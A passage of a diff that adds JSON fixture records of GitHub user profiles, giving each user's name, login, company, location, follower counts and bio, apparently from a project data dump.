"github.user", + "pk": 1177, + "fields": { + "nest_created_at": "2024-09-11T22:54:46.534Z", + "nest_updated_at": "2024-09-22T18:44:00.853Z", + "name": "Ajmal Kottilingal", + "login": "ajmalab", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/90693406?v=4", + "company": "Wise", + "location": "London", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2021-09-14T11:17:08Z", + "updated_at": "2024-09-04T16:22:54Z", + "node_id": "MDQ6VXNlcjkwNjkzNDA2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1178, + "fields": { + "nest_created_at": "2024-09-11T22:54:48.598Z", + "nest_updated_at": "2024-09-11T22:54:48.598Z", + "name": "Marius Giesenkirchen", + "login": "mariusgiesen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46571744?v=4", + "company": "Storm Reply GmbH", + "location": "Dortmund, Germany", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-01-10T16:49:25Z", + "updated_at": "2024-06-27T09:14:17Z", + "node_id": "MDQ6VXNlcjQ2NTcxNzQ0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1179, + "fields": { + "nest_created_at": "2024-09-11T22:54:49.422Z", + "nest_updated_at": "2024-09-11T22:54:49.422Z", + "name": "Abdulmalik Salawu", + "login": "saintmalik", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37118134?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 105, + "public_gists_count": 6, + "public_repositories_count": 26, + "created_at": "2018-03-06T17:20:14Z", + "updated_at": "2024-08-29T13:49:51Z", + "node_id": "MDQ6VXNlcjM3MTE4MTM0", + "bio": "minimalist", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1180, + "fields": { + "nest_created_at": "2024-09-11T22:54:51.870Z", + "nest_updated_at": "2024-09-22T19:42:25.268Z", + "name": "Robert Grant", + "login": "robertlagrant", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1766161?v=4", + "company": "Oxford Nanopore Technologies", + "location": "Oxford", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 7, + "public_gists_count": 2, + "public_repositories_count": 47, + "created_at": "2012-05-22T17:16:32Z", + "updated_at": "2024-09-03T17:13:53Z", + "node_id": "MDQ6VXNlcjE3NjYxNjE=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1181, + "fields": { + "nest_created_at": "2024-09-11T22:54:53.101Z", + "nest_updated_at": "2024-09-11T22:54:53.884Z", + "name": "", + "login": "crusy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6871303?v=4", + "company": "@Draegerwerk", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 4, + "public_repositories_count": 4, + "created_at": "2014-03-06T09:32:04Z", + "updated_at": "2024-07-26T10:44:02Z", + "node_id": "MDQ6VXNlcjY4NzEzMDM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1182, + "fields": { + "nest_created_at": "2024-09-11T22:54:54.692Z", + "nest_updated_at": "2024-09-11T22:54:54.692Z", + "name": "", + "login": "thewuffel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/84853379?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-05-26T13:01:34Z", + "updated_at": "2023-08-08T04:43:57Z", + "node_id": "MDQ6VXNlcjg0ODUzMzc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1183, + "fields": { + "nest_created_at": "2024-09-11T22:54:55.517Z", + "nest_updated_at": "2024-09-12T01:27:27.296Z", + "name": "Aleksandr Gadai", + "login": "alexgadai", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9041444?v=4", + "company": "", + "location": "Moscow, Russia", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-10-06T19:37:56Z", + "updated_at": "2024-08-17T07:42:27Z", + "node_id": "MDQ6VXNlcjkwNDE0NDQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1184, + "fields": { + "nest_created_at": "2024-09-11T22:54:56.360Z", + "nest_updated_at": "2024-09-12T01:33:38.269Z", + "name": "", + "login": "rashmimehta300", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/129749381?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-04-03T11:18:09Z", + "updated_at": "2024-05-08T07:58:07Z", + "node_id": "U_kgDOB7vRhQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1185, + "fields": { + "nest_created_at": "2024-09-11T22:54:57.164Z", + "nest_updated_at": "2024-09-22T07:41:22.462Z", + "name": "Kito D. Mann", + "login": "kito99", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3187538?v=4", + "company": "Virtua, Inc.", + "location": "Glen Allen, VA", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 51, + "public_gists_count": 0, + "public_repositories_count": 66, + "created_at": "2013-01-04T18:00:54Z", + "updated_at": "2024-02-13T20:16:10Z", + "node_id": "MDQ6VXNlcjMxODc1Mzg=", + "bio": "Architecture, training, development, and mentoring with Jakarta EE, JSF, Web Components, Microservices, etc.", + "is_hireable": true, + "twitter_username": "kito99" + } +}, +{ + "model": "github.user", + "pk": 1186, + "fields": { + "nest_created_at": "2024-09-11T22:55:01.376Z", + "nest_updated_at": "2024-09-11T22:55:01.376Z", + "name": "Igor Savin", + "login": "kibertoad", + "email": "iselwin@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1847934?v=4", + "company": "", + "location": "Vilnius", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 340, + "public_gists_count": 0, + "public_repositories_count": 160, + "created_at": "2012-06-13T20:26:45Z", + "updated_at": "2024-08-12T10:29:22Z", + "node_id": "MDQ6VXNlcjE4NDc5MzQ=", + "bio": "Principal engineer at @lokalise.\r\nLead maintainer of @knex ", + "is_hireable": false, + "twitter_username": "kibertoad" + } +}, +{ + "model": "github.user", + "pk": 1187, + "fields": { + "nest_created_at": "2024-09-11T22:55:08.549Z", + "nest_updated_at": "2024-09-11T22:55:09.384Z", + "name": "", + "login": "Kasyap-R", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/122060735?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 29, + "created_at": "2023-01-05T22:44:15Z", + "updated_at": "2024-08-04T20:11:32Z", + "node_id": "U_kgDOB0Z_vw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1188, + "fields": { + "nest_created_at": "2024-09-11T22:55:13.169Z", + "nest_updated_at": "2024-09-11T22:55:13.169Z", + "name": "", + "login": "monopoler08", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33096466?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-10-25T15:06:57Z", + "updated_at": "2023-12-20T16:40:29Z", + "node_id": "MDQ6VXNlcjMzMDk2NDY2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1189, + "fields": { + "nest_created_at": "2024-09-11T22:55:14.068Z", + "nest_updated_at": "2024-09-11T22:55:14.068Z", + "name": "Ethan Chapman", + "login": "Eiim", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24627058?v=4", + "company": "", + "location": "Ohio", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 16, + "public_gists_count": 1, + "public_repositories_count": 63, + "created_at": "2016-12-17T20:33:27Z", + "updated_at": "2024-09-10T21:43:56Z", + "node_id": "MDQ6VXNlcjI0NjI3MDU4", + "bio": "Data Science & Statistics student. I code primarily in Java, JS, R, and Python.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1190, + "fields": { + "nest_created_at": "2024-09-11T22:55:18.387Z", + "nest_updated_at": "2024-09-11T22:55:18.387Z", + "name": "", + "login": "blazgvajc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/35990879?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-01-31T07:59:32Z", + "updated_at": "2023-06-22T07:26:43Z", + "node_id": "MDQ6VXNlcjM1OTkwODc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1191, + "fields": { + "nest_created_at": "2024-09-11T22:55:23.716Z", + "nest_updated_at": "2024-09-11T23:20:04.509Z", + "name": "", + "login": "hornpeSICKAG", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/34032461?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-11-27T14:14:44Z", + "updated_at": "2024-09-03T08:22:34Z", + "node_id": "MDQ6VXNlcjM0MDMyNDYx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1192, + "fields": { + "nest_created_at": "2024-09-11T22:55:24.964Z", + "nest_updated_at": "2024-09-11T22:55:24.964Z", + "name": "", + "login": "sanjeeveejayabalan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/122220065?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2023-01-08T15:32:30Z", + "updated_at": "2024-08-14T06:01:34Z", + "node_id": "U_kgDOB0juIQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1193, + "fields": { + "nest_created_at": "2024-09-11T22:55:33.195Z", + "nest_updated_at": "2024-09-11T22:55:33.195Z", + "name": "Rohit Kumar", + "login": "rohitcoder", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17665703?v=4", + "company": "", + "location": "India", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 83, + "public_gists_count": 6, + "public_repositories_count": 99, + "created_at": "2016-03-05T06:01:41Z", + "updated_at": "2024-09-07T07:44:31Z", + "node_id": "MDQ6VXNlcjE3NjY1NzAz", + "bio": "I do what heroes do: I save the world.", + "is_hireable": true, + "twitter_username": "rohitcoder" + } +}, +{ + "model": "github.user", + "pk": 1194, + "fields": { + "nest_created_at": "2024-09-11T22:55:34.028Z", + "nest_updated_at": "2024-09-22T18:44:20.657Z", + "name": "Hritik Vijay", + "login": "Hritik14", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7457065?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 52, + "public_gists_count": 16, + "public_repositories_count": 94, + "created_at": "2014-05-01T09:22:12Z", + "updated_at": "2024-09-09T05:05:44Z", + "node_id": "MDQ6VXNlcjc0NTcwNjU=", + "bio": "Crazy about software and nature. Would love to talk: hey@hritik.sh", + "is_hireable": true, + "twitter_username": "MrHritik" + } +}, +{ + "model": "github.user", + "pk": 1195, + "fields": { + "nest_created_at": "2024-09-11T22:55:38.170Z", + "nest_updated_at": "2024-09-11T22:55:38.170Z", + "name": "", + "login": "anders-brujordet", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/111341363?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-08-16T07:07:28Z", + "updated_at": "2023-07-31T06:25:35Z", + "node_id": "U_kgDOBqLvMw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1196, + "fields": { + "nest_created_at": "2024-09-11T22:55:39.858Z", + "nest_updated_at": "2024-09-11T22:55:39.858Z", + "name": "Michael Fürmann", + "login": "qroac", + "email": "michael@spicyweb.de", + "avatar_url": "https://avatars.githubusercontent.com/u/165980?v=4", + "company": "Spicy Web", + "location": "Deutschland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 14, + "created_at": "2009-12-11T06:13:35Z", + "updated_at": "2024-08-15T15:30:20Z", + "node_id": "MDQ6VXNlcjE2NTk4MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1197, + "fields": { + "nest_created_at": "2024-09-11T22:55:41.048Z", + "nest_updated_at": "2024-09-22T18:49:14.949Z", + "name": "", + "login": "anthonyharrison", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8421867?v=4", + "company": "", + "location": "UK", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 35, + "public_gists_count": 0, + "public_repositories_count": 37, + "created_at": "2014-08-11T22:16:12Z", + "updated_at": "2024-09-14T18:09:49Z", + "node_id": "MDQ6VXNlcjg0MjE4Njc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1198, + "fields": { + "nest_created_at": "2024-09-11T22:55:43.081Z", + "nest_updated_at": "2024-09-11T22:55:43.081Z", + "name": "He Xusheng", + "login": "Moujuruo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/111495335?v=4", + "company": "Harbin Institute of Technology", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2022-08-18T08:43:46Z", + "updated_at": "2024-09-08T03:19:52Z", + "node_id": "U_kgDOBqVIpw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1199, + "fields": { + "nest_created_at": "2024-09-11T22:55:44.757Z", + "nest_updated_at": "2024-09-12T02:08:25.019Z", + "name": "", + "login": "Ranjithkumar-Arumugam-agilysys", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/129947444?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-04-05T09:36:21Z", + "updated_at": "2024-07-11T06:40:57Z", + "node_id": "U_kgDOB77XNA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1200, + "fields": { + "nest_created_at": "2024-09-11T22:55:48.384Z", + "nest_updated_at": "2024-09-11T22:55:48.384Z", + "name": "", + "login": "agrawalarpit01", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/96225378?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-12-16T06:31:50Z", + "updated_at": "2022-11-14T08:50:44Z", + "node_id": "U_kgDOBbxIYg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1201, + "fields": { + "nest_created_at": "2024-09-11T22:55:51.735Z", + "nest_updated_at": "2024-09-11T22:55:51.735Z", + "name": "", + "login": "abhinavsaxena-webengage", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/101795979?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-03-17T08:39:38Z", + "updated_at": "2024-02-21T11:49:02Z", + "node_id": "U_kgDOBhFIiw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1202, + "fields": { + "nest_created_at": "2024-09-11T22:56:14.697Z", + "nest_updated_at": "2024-09-11T22:56:14.697Z", + "name": "", + "login": "ThamizhiniyanPandiyan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/124239736?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-02-02T06:56:35Z", + "updated_at": "2023-09-13T11:23:31Z", + "node_id": "U_kgDOB2e_eA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1203, + "fields": { + "nest_created_at": "2024-09-11T22:56:16.308Z", + "nest_updated_at": "2024-09-11T23:07:27.898Z", + "name": "Pooja Shah", + "login": "pooja0805", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53046887?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2019-07-18T12:35:28Z", + "updated_at": "2024-09-03T09:24:35Z", + "node_id": "MDQ6VXNlcjUzMDQ2ODg3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1204, + "fields": { + "nest_created_at": "2024-09-11T22:56:18.073Z", + "nest_updated_at": "2024-09-11T22:56:18.073Z", + "name": "", + "login": "trend-sandy-lin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/129042268?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-03-27T07:31:43Z", + "updated_at": "2024-05-02T07:50:59Z", + "node_id": "U_kgDOB7EHXA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1205, + "fields": { + "nest_created_at": "2024-09-11T22:56:19.003Z", + "nest_updated_at": "2024-09-11T22:56:19.003Z", + "name": "SHUBHAM BHINGARDE", + "login": "cdacshubhambhingarde", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/145668848?v=4", + "company": "CDAC Mumbai", + "location": "Juhu", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-09-21T10:41:22Z", + "updated_at": "2023-09-21T11:44:08Z", + "node_id": "U_kgDOCK668A", + "bio": "#DevSecOps #SCA \r\nfor my personal github repository https://github.com/Shubham-Bhingarde", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1206, + "fields": { + "nest_created_at": "2024-09-11T22:56:20.663Z", + "nest_updated_at": "2024-09-11T22:56:20.663Z", + "name": "", + "login": "kacq", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/106887346?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-06-04T19:48:24Z", + "updated_at": "2024-01-23T11:00:49Z", + "node_id": "U_kgDOBl74sg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1207, + "fields": { + "nest_created_at": "2024-09-11T22:56:31.497Z", + "nest_updated_at": "2024-09-11T22:56:31.497Z", + "name": "", + "login": "marcosanchotene", + "email": "marco@pontograu.com", + "avatar_url": "https://avatars.githubusercontent.com/u/14004027?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 2, + "public_repositories_count": 12, + "created_at": "2015-08-27T18:33:25Z", + "updated_at": "2024-08-21T19:41:14Z", + "node_id": "MDQ6VXNlcjE0MDA0MDI3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1208, + "fields": { + "nest_created_at": "2024-09-11T22:56:33.984Z", + "nest_updated_at": "2024-09-22T18:44:02.752Z", + "name": "", + "login": "robaliias", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44269772?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-10-18T15:57:53Z", + "updated_at": "2024-07-31T08:47:57Z", + "node_id": "MDQ6VXNlcjQ0MjY5Nzcy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1209, + "fields": { + "nest_created_at": "2024-09-11T22:56:35.196Z", + "nest_updated_at": "2024-09-22T19:42:19.514Z", + "name": "Adam Setch", + "login": "setchy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/386277?v=4", + "company": "World Kinect", + "location": "Miami, FL", + "collaborators_count": 0, + "following_count": 174, + "followers_count": 36, + "public_gists_count": 0, + "public_repositories_count": 55, + "created_at": "2010-09-03T09:29:03Z", + "updated_at": "2024-09-19T13:34:09Z", + "node_id": "MDQ6VXNlcjM4NjI3Nw==", + "bio": "🌎 Vice President // Domain Architect @WorldKinect | 👨‍💻 Creator of atlassify, Maintainer of @gitify-app | 🚀 DX & GraphQL Enthusiast", + "is_hireable": false, + "twitter_username": "setchy87" + } +}, +{ + "model": "github.user", + "pk": 1210, + "fields": { + "nest_created_at": "2024-09-11T23:07:17.290Z", + "nest_updated_at": "2024-09-22T18:44:02.140Z", + "name": "Maxime Robert", + "login": "marob", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3486231?v=4", + "company": "@Smile-SA ", + "location": "France", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 28, + "public_gists_count": 3, + "public_repositories_count": 73, + "created_at": "2013-02-05T22:27:02Z", + "updated_at": "2024-09-06T11:27:12Z", + "node_id": "MDQ6VXNlcjM0ODYyMzE=", + "bio": "Open Source believer, I work as a Java, JS and Frontend Technical Expert at @Smile-SA", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1211, + "fields": { + "nest_created_at": "2024-09-11T23:07:18.128Z", + "nest_updated_at": "2024-09-22T18:44:03.715Z", + "name": "Jacek Puchta", + "login": "puchta", + "email": "jacek.puchta@dotdata.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29863240?v=4", + "company": "dotData Inc.", + "location": "Warsaw", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-07-03T12:33:48Z", + "updated_at": "2024-08-19T08:48:44Z", + "node_id": "MDQ6VXNlcjI5ODYzMjQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1212, + "fields": { + "nest_created_at": "2024-09-11T23:07:23.217Z", + "nest_updated_at": "2024-09-22T18:44:12.617Z", + "name": "Visagan Santhanam", + "login": "visagansanthanam-unisys", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/100369838?v=4", + "company": "@Unisys ", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-02-24T16:12:20Z", + "updated_at": "2024-03-27T13:01:17Z", + "node_id": "U_kgDOBfuFrg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1213, + "fields": { + "nest_created_at": "2024-09-11T23:07:38.625Z", + "nest_updated_at": "2024-09-22T18:44:08.532Z", + "name": "Gabriel Bennett", + "login": "gbennett-squarespace", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/95309935?v=4", + "company": "Squarespace", + "location": "Portland, OR", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-11-30T18:32:06Z", + "updated_at": "2024-06-08T17:04:24Z", + "node_id": "U_kgDOBa5Qbw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1214, + "fields": { + "nest_created_at": "2024-09-11T23:07:44.016Z", + "nest_updated_at": "2024-09-11T23:07:44.016Z", + "name": "", + "login": "Amoms", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/140499470?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-07-25T09:27:26Z", + "updated_at": "2023-11-17T05:38:28Z", + "node_id": "U_kgDOCF_aDg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1215, + "fields": { + "nest_created_at": "2024-09-11T23:07:46.108Z", + "nest_updated_at": "2024-09-11T23:07:46.108Z", + "name": "", + "login": "yff-java", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60810545?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2020-02-08T08:47:59Z", + "updated_at": "2024-08-18T11:56:32Z", + "node_id": "MDQ6VXNlcjYwODEwNTQ1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1216, + "fields": { + "nest_created_at": "2024-09-11T23:07:47.315Z", + "nest_updated_at": "2024-09-11T23:07:48.135Z", + "name": "Swetha Krishnan", + "login": "swkrkris", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/93231519?v=4", + "company": "@Oracle Cloud Infrastructure ", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-10-26T23:54:15Z", + "updated_at": "2024-04-03T23:57:09Z", + "node_id": "U_kgDOBY6Znw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1217, + "fields": { + "nest_created_at": "2024-09-11T23:07:48.989Z", + "nest_updated_at": "2024-09-11T23:07:48.989Z", + "name": "Pandiyan", + "login": "pandiyan-securin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/144091669?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-09-05T05:20:28Z", + "updated_at": "2024-05-08T12:05:34Z", + "node_id": "U_kgDOCJaqFQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1218, + "fields": { + "nest_created_at": "2024-09-11T23:07:53.153Z", + "nest_updated_at": "2024-09-11T23:07:53.153Z", + "name": "vipul anant", + "login": "anvipul", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/110393012?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-08-01T11:07:37Z", + "updated_at": "2024-09-06T11:43:39Z", + "node_id": "U_kgDOBpR2tA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1219, + "fields": { + "nest_created_at": "2024-09-11T23:07:59.791Z", + "nest_updated_at": "2024-09-22T18:43:59.305Z", + "name": "Aryan Rajoria", + "login": "aryan-rajoria", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57455619?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 38, + "created_at": "2019-11-06T17:36:26Z", + "updated_at": "2024-09-17T16:07:45Z", + "node_id": "MDQ6VXNlcjU3NDU1NjE5", + "bio": "Masters at Georgia Tech", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1220, + "fields": { + "nest_created_at": "2024-09-11T23:08:10.264Z", + "nest_updated_at": "2024-09-11T23:08:10.264Z", + "name": "June", + "login": "SSJune821", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26968714?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-04-06T13:59:54Z", + "updated_at": "2024-04-12T04:53:12Z", + "node_id": "MDQ6VXNlcjI2OTY4NzE0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1221, + "fields": { + "nest_created_at": "2024-09-11T23:08:28.836Z", + "nest_updated_at": "2024-09-11T23:08:28.836Z", + "name": "", + "login": "srace9532", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22940652?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-10-19T16:16:31Z", + "updated_at": "2024-09-10T02:09:24Z", + "node_id": "MDQ6VXNlcjIyOTQwNjUy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1222, + "fields": { + "nest_created_at": "2024-09-11T23:08:30.500Z", + "nest_updated_at": "2024-09-11T23:08:30.500Z", + "name": "Hariharan", + "login": "hari326", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15031266?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2015-10-08T11:03:32Z", + "updated_at": "2024-08-20T11:35:51Z", + "node_id": 